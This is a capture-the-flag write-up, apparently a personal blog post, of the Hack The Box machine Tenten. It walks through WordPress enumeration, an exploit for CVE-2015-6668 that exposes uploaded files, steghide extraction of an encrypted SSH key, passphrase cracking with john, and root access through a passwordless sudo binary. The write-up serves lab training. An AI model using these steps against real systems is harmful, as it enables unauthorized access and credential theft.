Previous Page

nihilist - 21 / 02 / 2020

Tenten Writeup

Introduction :



Tenten is a medium linux box released back in March 2017.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


  λ nihilist [ 10.10.14.20/23 ] [~]
  → nmap -F 10.10.10.10
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:20 GMT
  Nmap scan report for 10.10.10.10
  Host is up (0.100s latency).
  Not shown: 98 filtered ports
  PORT   STATE SERVICE
  22/tcp open  ssh
  80/tcp open  http

  Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds

  λ nihilist [ 10.10.14.20/23 ] [~]
  → nmap -sCV -p22,80 10.10.10.10
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:21 GMT
  Nmap scan report for 10.10.10.10
  Host is up (0.10s latency).

  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
  |   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
  |_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-generator: WordPress 4.7.3
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Job Portal – Just another WordPress site
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

Part 2 : Getting User Access



Our nmap scan picked up wordpress running on port 80 : let's run WPScan to enumerate it further :


  λ nihilist [ 10.10.14.20/23 ] [~]
  → wpscan --url http://10.10.10.10/ -e
  _______________________________________________________________
           __          _______   _____
           \ \        / /  __ \ / ____|
            \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
             \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
              \  /\  /  | |     ____) | (__| (_| | | | |
               \/  \/   |_|    |_____/ \___|\__,_|_| |_|

           WordPress Security Scanner by the WPScan Team
                           Version 3.7.8
         Sponsored by Automattic - https://automattic.com/
         @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  _______________________________________________________________

  [+] URL: http://10.10.10.10/
  [+] Started: Fri Feb 21 15:25:37 2020

  Interesting Finding(s):

  [+] http://10.10.10.10/
   | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
   | Found By: Headers (Passive Detection)
   | Confidence: 100%

  [+] http://10.10.10.10/xmlrpc.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
   | References:
   |  - http://codex.wordpress.org/XML-RPC_Pingback_API
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
   |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

  [+] http://10.10.10.10/readme.html
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%

  [+] http://10.10.10.10/wp-cron.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 60%
   | References:
   |  - https://www.iplocation.net/defend-wordpress-from-ddos
   |  - https://github.com/wpscanteam/wpscan/issues/1299

  [+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
   | Found By: Rss Generator (Passive Detection)
   |  - http://10.10.10.10/index.php/feed/, https://wordpress.org/?v=4.7.3
   |  - http://10.10.10.10/index.php/comments/feed/, https://wordpress.org/?v=4.7.3

  [+] WordPress theme in use: twentyseventeen
   | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
   | Last Updated: 2019-05-07T00:00:00.000Z
   | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
   | [!] The version is out of date, the latest version is 2.2
   | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
   | Style Name: Twenty Seventeen
   | Style URI: https://wordpress.org/themes/twentyseventeen/
   | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
   | Author: the WordPress team
   | Author URI: https://wordpress.org/
   |
   | Found By: Css Style In Homepage (Passive Detection)
   |
   | Version: 1.1 (80% confidence)
   | Found By: Style (Passive Detection)
   |  - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'

  [+] Enumerating Vulnerable Plugins (via Passive Methods)
  [+] Checking Plugin Versions (via Passive and Aggressive Methods)

  [i] No plugins Found.

  [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
   Checking Known Locations - Time: 00:00:07 <======================================> (324 / 324) 100.00% Time: 00:00:07
  [+] Checking Theme Versions (via Passive and Aggressive Methods)

  [i] No themes Found.

  [+] Enumerating Timthumbs (via Passive and Aggressive Methods)
   Checking Known Locations - Time: 00:00:55 <====================================> (2575 / 2575) 100.00% Time: 00:00:55

  [i] No Timthumbs Found.

  [+] Enumerating Config Backups (via Passive and Aggressive Methods)
   Checking Config Backups - Time: 00:00:00 <=========================================> (21 / 21) 100.00% Time: 00:00:00

  [i] No Config Backups Found.

  [+] Enumerating DB Exports (via Passive and Aggressive Methods)
   Checking DB Exports - Time: 00:00:00 <=============================================> (36 / 36) 100.00% Time: 00:00:00

  [i] No DB Exports Found.

  [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
   Brute Forcing Attachment IDs - Time: 00:00:02 <==================================> (100 / 100) 100.00% Time: 00:00:02

  [i] No Medias Found.

  [+] Enumerating Users (via Passive and Aggressive Methods)
   Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00

  [i] User(s) Identified:

  [+] takis
   | Found By: Author Posts - Author Pattern (Passive Detection)
   | Confirmed By:
   |  Rss Generator (Passive Detection)
   |  Wp Json Api (Aggressive Detection)
   |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
   |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
   |  Login Error Messages (Aggressive Detection)

  [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

  [+] Finished: Fri Feb 21 15:26:54 2020
  [+] Requests Done: 3082
  [+] Cached Requests: 40
  [+] Data Sent: 762.012 KB
  [+] Data Received: 707.953 KB
  [+] Memory used: 209.004 MB
  [+] Elapsed time: 00:01:17

Looking at the results , we see that our scan picked up the usernames : takis and user1, let's head over to the website, clicking on the "jobs listing tab"

Here we see that we are looking at what seems to be the page indexed 8, so let's see if we can list every page to see if we can find any irregularities


  λ nihilist [ 10.10.14.20/23 ] [~]
→ for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application:  – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application – Job Portal</title>
15: <title>Job Application – Job Portal</title>

Looks like we have something odd at the index 13, which could indicate an outdated wordpress plugin vulnerability : CVE-2015-6668 Which details how one can access files at a certain url using the following syntax /wp-content/uploads/%year%/%month%/%filename%


    λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-02-21 15:40:29--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted.jpg       100%[===============================================>] 256.26K   418KB/s    in 0.6s

2020-02-21 15:40:29 (418 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]


λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ file HackerAccessGranted.jpg
HackerAccessGranted.jpg: JPEG image data, JFIF standard 1.01, resolution (DPCM), density 29x29, segment length 16, baseline, precision 8, 1500x1001, components 3

Looking at the results, we seem to have downloaded a jpg file , but let's assume that this is no regular image, and it probably contains some information. Using steganography tools we discover the hidden data :


  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → steghide extract -sf HackerAccessGranted.jpg
  Enter passphrase:
  wrote extracted data to "id_rsa".

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → file id_rsa
  id_rsa: PEM RSA private key

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → cat id_rsa
  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

  /HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
  tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
  1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
  K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
  SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
  WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
  VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
  J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
  AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
  2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
  6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
  pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
  tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
  KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
  4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
  2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
  L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
  VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
  5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
  Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
  p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
  yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
  9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
  vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
  YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
  -----END RSA PRIVATE KEY-----

Looks like we extracted a private key ! although it is encrypted, so we'll use sshng2john and john to crack it and somehow guess it's passphrase.


  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → curl -sk https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py > sshng2john.py

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → python sshng2john.py id_rsa > id_rsa.encrypted

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → file id_rsa.encrypted
  id_rsa.encrypted: ASCII text, with very long lines

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
  Created directory: /home/nihilist/.john
  Using default input encoding: UTF-8
  Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
  Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
  Cost 2 (iteration count) is 1 for all loaded hashes
  Will run 4 OpenMP threads
  Note: This format may emit false positives, so it will keep trying even after
  finding a possible candidate.
  Press 'q' or Ctrl-C to abort, almost any other key for status
  superpassword    (id_rsa)
  Warning: Only 2 candidates left, minimum 4 needed for performance.
  1g 0:00:00:09 DONE (2020-02-21 15:46) 0.1006g/s 1442Kp/s 1442Kc/s 1442KC/sa6_123..*7¡Vamos!
  Session completed

and it was quick ! the password was at the beginning of rockyou.txt : superpassword , now let's use it to log into the machine :


  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → chmod 600 id_rsa

  λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
  → ssh -i id_rsa takis@10.10.10.10
  Enter passphrase for key 'id_rsa':
  Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage

  65 packages can be updated.
  39 updates are security updates.


  Last login: Fri May  5 23:05:36 2017
  takis@tenten:~$ whoami
  takis
  takis@tenten:~$ cat /home/takis/user.txt
  e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we have been able to print out the user password.

Part 3 : Getting Root Access



In order to privesc we check if we can execute any binary as root without passwords using sudo -l


  takis@tenten:~$ cat /root/root.txt
  cat: /root/root.txt: Permission denied
  takis@tenten:~$ sudo -l
  Matching Defaults entries for takis on tenten:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User takis may run the following commands on tenten:
      (ALL : ALL) ALL
      (ALL) NOPASSWD: /bin/fuckin

looks like we have a candidate named fuckin , let's see if we can execute commands as root :


takis@tenten:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)

And we were right , we can execute commands as root, let's print out the root flag :


  takis@tenten:~$ sudo fuckin cat /root/root.txt
  f9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it ! we have been able to print out the root flag.

Conclusion



Here we can see the progress graph :

Nihilism

Until there is Nothing left.



Creative Commons Zero: No Rights Reserved

About nihilist

Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8


Contact: nihilist@contact.nowhere.moe (PGP)